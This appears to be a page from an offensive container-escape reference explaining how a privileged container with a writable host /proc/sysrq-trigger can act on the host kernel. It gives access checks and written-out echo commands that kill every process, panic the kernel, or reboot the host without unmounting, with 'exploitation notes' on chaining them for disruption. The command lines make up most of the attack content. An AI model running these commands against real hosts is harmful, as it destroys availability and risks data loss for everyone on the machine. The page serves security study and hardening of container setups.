/proc/sysrq-trigger is a write-only entry point to the kernel's magic-sysrq handler. A single character written to it runs the corresponding sysrq command against the host kernel: s syncs disks, e sends SIGTERM to all processes except init, i sends SIGKILL to all, f invokes the out-of-memory killer, c crashes the kernel, and b reboots immediately without unmounting. These act on the host because sysrq is global, so a container with the host procfs mounted writable can reach host-wide effects.
Confirm access and that sysrq is enabled:
[ -w /proc/sysrq-trigger ] && echo writable
cat /proc/sys/kernel/sysrq # bitmask of allowed sysrq functions; 1 = all
Available actions#
echo s > /proc/sysrq-trigger # sync all mounted filesystems
echo e > /proc/sysrq-trigger # SIGTERM to all user processes (mass kill)
echo i > /proc/sysrq-trigger # SIGKILL to all user processes
echo c > /proc/sysrq-trigger # crash the host (kernel panic)
echo b > /proc/sysrq-trigger # immediate reboot, no clean unmount
Exploitation notes#
- This is primarily a denial-of-service and disruption primitive, not a direct code-execution escape: it cannot run an attacker program the way core_pattern or uevent_helper can.
- The mass-kill actions (
e,i) can be chained: killing a host process can force a supervisor to restart it in a way the attacker influences, or clear a lock an attacker needs, but on its own it only destroys availability. - The
sysrqbitmask in/proc/sys/kernel/sysrqmay restrict which functions are permitted;0disables sysrq entirely and defeats the technique. - Reaching this needs the host procfs mounted writable, typically a privileged container.